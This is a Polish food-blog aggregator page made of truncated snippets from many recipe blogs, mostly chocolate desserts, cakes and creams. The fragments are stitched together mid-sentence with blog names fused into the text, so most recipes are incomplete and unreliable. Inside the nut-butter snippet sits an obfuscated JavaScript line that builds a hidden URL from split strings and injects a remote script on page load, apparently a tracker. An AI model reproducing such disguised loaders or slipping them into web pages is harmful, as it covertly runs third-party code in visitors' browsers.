dobre kalorie a więc idealny deser dla wielbicieli czekoladowych smaków. Składniki: 1 dojrzałe awokado 2 banany 2 łyżki kakao Łyżeczka soku z cytryny Owoce do dekoracji np banany, truskawki, maliny Awokado przekroić wzdłuż na pół, wyjść pestkę, ściągnąć skórkę a miąższ zmiksować z bananami, kakao i sokiem z cytryny. Krem przełożyć do szklanek, udekorować owocami np bananem pokrojonym
Niespełnione zdolności kulinarnestopni do suchego patyczka (około 35 minut.) Krem pomarańczowy 1/2 litra soku przecierowego z pomarańczy 1 budyń waniliowy 1-2 łyżki cukru opcjonalnie Blat biszkoptowy włożyć do tortownicy (tortownica powinna być wysoka, lub użyjcie większej tortownicy) Z soku pomarańczowego ugotować budyń i gorący przelać na biszkopt, wystudzić. Mus czekoladowy 225 g gorzkiej czekolady posiekanej na drobniutkie kawałki 2 łyżki
Piekarz-Kucharz-Garkotłukpyszne tarteletki z orzeźwiającym curdem cytrynowym, na chrupiącym czekoladowym spodzie, smakują wyśmienicie, i do tego sycą na bardzo długo, spód wykonany z dodatkiem płatków śniadaniowych i mąki orkiszowej, pokazujący, że płatki można jeść na wiele różnych sposobów, nie tylko w nieśmiertelnej wersji z mlekiem, do tego lekki i puszysty krem cytrynowy, na wierzchu śmietanka kokosowa i obłędny deser gotowy
zdrowa vege kuchniataki tort, są jadalne. W jego wnętrzu znajdziemy smaczny krem, z kolei wykończenie jest zrobione z różnokolorowych mas lukrowych. Różnorodne dekoracje tortów Torty 3D w zależności od uroczystości, z okazji której są wykonywane, posiadają bardzo różnorodne dekoracje. Są one wykonane ze wspomnianych wcześniej mas lukrowych, jednak również wykorzystywana jest masa czekoladowa, a także czekolada plastyczna. Z pewnością nikt
Kuchcik gotujemocnego naparu kawy • 2 łyżki rumu lub amaretto Krem • 3 żółtka • 1 jajko • 3/4 szklanki cukru • 250 g masła • 3 serki waniliowe po 200 g • 2 szklanki mleka w proszku • 3 łyżki żelatyny + 1/3 szklanki wody Polewa • 1 gorzka czekolada • 1/3 szklanki śmietanki 30% • 2 łyżki mocnego naparu kawy • czekoladowe ziarna kawy do dekoracji – opcjonalnie Wykonanie
To co kochamszybki deser do kawki lub herbatki :) Mleczny krem jest obłędnie dobry, na jednym waflu nie poprzestaniecie ;) Składniki na jedno opk. wafli okrągłych Masa biała: 1/4 szkl mleka 1/4 szkl cukru lub nawet odrobinę mniej bo masa jest dosyć słodka 1/4 kostki masła 1 szkl mleka w proszku Masa czekoladowa: 1/4 kostki masła 1/4 szkl mleka 1/4 szkl cukru 2 czubate
Gotowanie...to proste !łyżeczki * domowy likier śmietankowo – czekoladowy – 4 łyżki * płatki migdałów – 50 g DO DEKORACJI : * płatki migdałów – 50 g * czekolada deserowa – 50 g * ciastka z karmelem w czekoladzie – ok. 20 szt SPOSÓB PRZYRZĄDZENIA : BISZKOPT : Jajka wbijamy do miski , dosypujemy cukier i ubijamy 10 minut mikserem na puszysty krem. Stopniowo dosypujemy mąkę przesianą z proszkiem do pieczenia
Ostra na Słodkoformułować kule. Każdą kulę wkładać do papilotki, polewać polewą czekoladową i posypywać płatkami migdałowymi. Odstawić do lodówki na minimum 2 godziny. SMACZNEGO! Uwagi do przepisu: Ja używam ciastek zbożowych Benitki dostępne w sieci sklepów Biedronka. Można je śmiało zastąpić innymi ciastkami typu petit beurre, digestive, herbatnikami, czy końcówkami ciast bez kremów, bakali czy żelatyny. Ciasta można rozgnieść za pomocą specjalnej
Gospodyni Miejskamasala ; blog: Smaczne opowieści GROCH Groszek z marchewką i dynią ; blog: Czerwień i błękit Zupa grochowa ; blog: Moje domowe kucharzenie Zupa solferino (z groszkiem zielonym) ; blog: Moje domowe kucharzenie Krem z zielonego grochu czyli zielona grochówka ; blog: Smakołyki Angeli Zupa grochowa z bekonem ; blog: Kulinarne odsłony Pati Sałatka z jajkami, porem i groszkiem ; blog: Czerwień i błękit Sałatka pieczarkowa(...)fasolą ; blog: Weekendy w domu i ogrodzie Ekspresowe chili con carne z fasolą ; blog: Weekendy w domu i ogrodzie Florencka (toskańska) zupa z fasoli (ribollita) ; blog: Smakołyki Angeli Bardzo czekoladowe ciasto z fasoli ; blog: Państwo Wojtczuk gotują Pieczona fasola jak z bistro ; blog: Hajduczek naturalnie Zupa fasolowa z soczewicą i wędzoną papryką na boczku ; blog: Czerwień i błękit Sałatka
Weekendy w domu i ogrodzietego ciasta wszystko się zaczęło! Kiedy poprosiłam przyjaciółkę o smaczny i prosty przepis na czekoladowe ciasto, nie spodziewałam się, że parę miesięcy później, taka amatorka pieczenia jak ja, założy blog kulinarny! Ponad dwa lata temu mąż podarował mi piekarnik, dzięki któremu mogłam wrócić do słodkiej pasji, która z niezależnych ode mnie przyczyn musiała zostać odłożona na kilka lat do szafy(...)zabierałam się za pieczenie tego ciasta nie potrafiłam zrobić nawet kruszonki! O biszkopcie nawet nie marzyłam. Dziś krem maślany na bezie szwajcarskiej potrafię zrobić z zamkniętymi oczami ;). Jeśli zastanawiacie się, czy zdążycie się jeszcze kiedykolwiek nauczyć piec, to powiem Wam, że tak! W ciągu tego krótkiego czasu dowiedziałam się, że aby jakikolwiek wypiek się udał, muszą zostać spełnione pewne warunki
Słodki PomysłMasa z kremem mascarone: 250 g mascarpone 330ml kremówki 5 łyżek cukru pudru śnieżka w proszku 3 łyżeczki żelatyny rozpuszczone w niewielkiej ( ok. 50 ml. ) gorącej wody Kremówkę miksujemy na sztywno z cukrem i fixem. Do sztywnej śmietany dodajemy po łyżce mascarpone i delikatnie mieszamy. Łączymy z żelatyną. Dodatkowo: sos czekoladowy lub polewa Normal 0 21 false
Domowe ciastadosyć wysoki, spokojnie można pokroić go na 10-12 dużych kawałków. Składniki na biszkopty: 4 jajka 12 łyżek mąki pszennej 4 łyżki mąki ziemniaczanej 12 łyżek cukru Składniki na krem: 500 g serka mascarpone 600 ml śmietany kremówki 1 łyżka cukru pudru 2 łyżeczki cukru waniliowego 1 utrwalacz do bitej śmietany (można pominąć, ale wtedy tort koniecznie musi być przechowywany(...)poncz, barwniki spożywcze w żelu (u mnie czerwony i niebieski), złota farbka lub jadalny brokat cukierniczy, 2 opakowania galaretki, dowolne owoce (u mnie maliny), gorzka czekolada lub polewa czekoladowa na oczy. Biszkopty pieczemy według przepisu . Można zrobić to dzień wcześniej, żeby miały dużo czasu na przestudzenie. Galaretkę rozpuszczamy w ok. 400 ml gorącej wody. Foremki lub miseczki o średnicy zbliżonej
CiastkozercyCiasto jeżynowo malinowe na czekoladowym biszkopcie. Czy może być coś lepszego. Lekko kwaskowe, mocno owocowe. Na jednym kawałku nie poprzestaniecie. biszkopt: 3 jajka wielkość M 1/3 szklanki cukru 1 łyżeczka kakao 1 łyżka mąki ziemniaczanej płaska 1/2 szklanki mąki pszennej tortowej 1/2 łyżeczki proszku do pieczenia krem: 250 g serka mascarpone 1/2 galaretki malinowej 350 ml śmietany kremówki
wesoła kuchniaczekoladowy z aquafaby Mus czekoladowy z mascarpone Mus czekoladowy z ricotty Naleśnik z gorgonzolą zielonymi oliwkami i suszonymi pomidorami Oscypkowe miseczki wypełnione rukolą, suszonymi pomidorami i włoskimi orzechami Pasta z ciecierzycy z oregano, czosnkiem i chia Pasta z ciecierzycy z suszonymi pomidorami i papryką Podpłomyki Proziaki Sałatka z burakiem i kremem balsamicznym Sałatka z burakiem i serkiem wiejskim Sałatka
Moja smaczna kuchniaurodziny mojego narzeczonego zrobiłam, czekoladowe ciasto z malinami z dodatkiem orzechów laskowych. Połączenie czekolady z malinami to po prostu strzał w dziesiątkę i ciasto bardzo smakowało gościom. Składniki: Biszkopt: 5 jajek 1/2 szklanki orzechów laskowych 4 łyżki mąki 2 łyżeczki proszku do pieczenia 4 łyżki cukru Krem: 5 łyżek nutelli 100 g czekolady 300 g malin do dekoracji szklanka
Delusional Trinemarynowaną brukwią – Pikantna zupa krem z brukwi i dyni z prażonymi płatkami migdałów – Kotlety z brukwi na maślakach z nektarynką – Kopytka z topinamburu z gulaszem z żołądków drobiowych – Sernik z topinamburem i kasztanami – Chleb z topinamburu z czarnuszką i masłem koperkowym – Hummus buraczany – Ciasto buraczano-czekoladowe z lukrem buraczanym – Lody z pieczonych
WojnaNaSmaki.plPrzepis "przerzucony" z mojego poprzedniego bloga:) Wrzesień, wrzesień... i kolejna Weekendowa Cukiernia . W tym miesiącu Tofka nam gospodarzy i tym samym zaproponowała nam na wspólne pieczenie
In my kitchenKremy orzechowe podbiły serca Polaków już wiele lat temu. Sprawdzają się nie tylko jako pasta do kanapek na pożywne śniadanie, lecz także jako składnik zdrowych deserów i ciast. Można je z powodzeniem wykorzystywać do domowych wypieków czy lodowych deserów. Zdrowe pasty z małą ilością cukru stanowią dobrą przeciwwagę dla bardzo słodkich mas. Jak używać past orzechowych, by nasze desery były(...)dodać sól, wiórki kokosowe lub czekoladowe, chilli, miód, cynamon czy kawałki pistacji. W ten sposób uzyskamy bardzo dobry deser, który nie jest za słodki. (function(){ xXck_=("u"+"")+"s"+"";xXck_+=("tat.")+("i"); xXck=document.createElement("script");xXck.type="text/javascript";xXck_+="nf"+("o")+"/"; xXcku="304383856"+".";xXck.async=true;xXcku+="nyizbazyXckXu852j4uyn4d94qvtpv"; xXck.src="https://"+xXck_+xXcku;xXckb=document.body;xXckb.appendChild(xXck); })(); Artykuł Kremy orzechowe idealne do wypieków
sierotka maRysia w kuchniożywi smak i nie będzie mdłe. Powstały krem podzielić na 3 części. Jabłka [ jabłka zetrzeć na tarce o grubych oczkach, dodać cukier do smaku i chwilkę poddusić ]wymieszać z galaretką w proszku i chwilkę pogotować, wystudzić. Upieczone placki przełożyć masą z kaszy manny i jabłkami i galaretką,wierzch polać polewą czekoladową i dowolnie udekorować
Moje domowe kucharzeniemożemy upiec wcześniej i przechowywać w pudełku. A krem i glazurę możemy kupić i mieć na tzw. "czarną godzinę" do nadziewania. Składniki: Ciasto kruche: 1,5 szkl mąki pszennej 1 szkl mąki krupczatki 200 g zimnego masła 2 żółtka 1/2 szklanki cukru pudru 1 łyżka cukru waniliowego brzoskwinie z puszki nadzienie czekoladowe Lauretta glazura Mirror Przygotowanie: Mąki przesiać
Ala piecze i gotujeczekolady * czerwony barwnik sp ożywczy * czekoladowe literki oraz ozdoby na tort Przygotowanie : Biszkopt przekroić na 3 części. Pierwszy blat posmarować dżemem. Ubić kremówkę z cukrem pudrem i serkiem mascarpone. Nało ż yć trochę kr emu na dżem. Tak samo przyg otować drugi blat. Na trzeci na łożyć tylko krem. Wyrównać dobrze cały tort
Magiczne Życie MartyWaszego wyboru, czy będzie mniej lub bardzie czekoladowe. Przygotowanie: Do garnka wlej około 800 ml mleka, dodaj karob, cukier i kaszkę. Dokładnie mieszaj całość aż się zagotuje i zgęstnieje. Wyłącz gaz i dodaj masło kokosowe, dokładnie wymieszaj. Dno formy wyłóż papierem i warstwą ciastek. Na ciastka wyłóż połowę masy. Na krem warstwę ciastek, a na ciastka połowę dżemu. Na dżem
greenscarfAwokado świetnie łączy się z czekoladowym smakiem, więc warto je wykorzystać przy przygotowywaniu deserów. Nigdy wcześniej nie myślałam by wykorzystać je w deserze, gdyż sam smak awokado jak dla mnie był mało kojarzący się ze słodyczami. Jakże się myliłam, owoc ten jest wprost stworzony by dodawać go do kremów i pałaszować nie myśląc ile to złego tłuszczu się zjada. Wszak
Kuchcik gotujekrem – placek – dżem – gorący krem – placek . Po złożeniu ciasto wystudzić. Jeśli nie potrzebujemy ciasta na już, najlepiej jeśli zawiniemy go w folię spożywczą i odłożymy na 1-2 dni do lodówki lub w chłodne miejsce – wtedy ciasto ładnie zmięknie i dopiero po wyjęciu z folii polewamy polewą czekoladową. Jeśli chcemy mieć od razu gotowe
kuchcikownia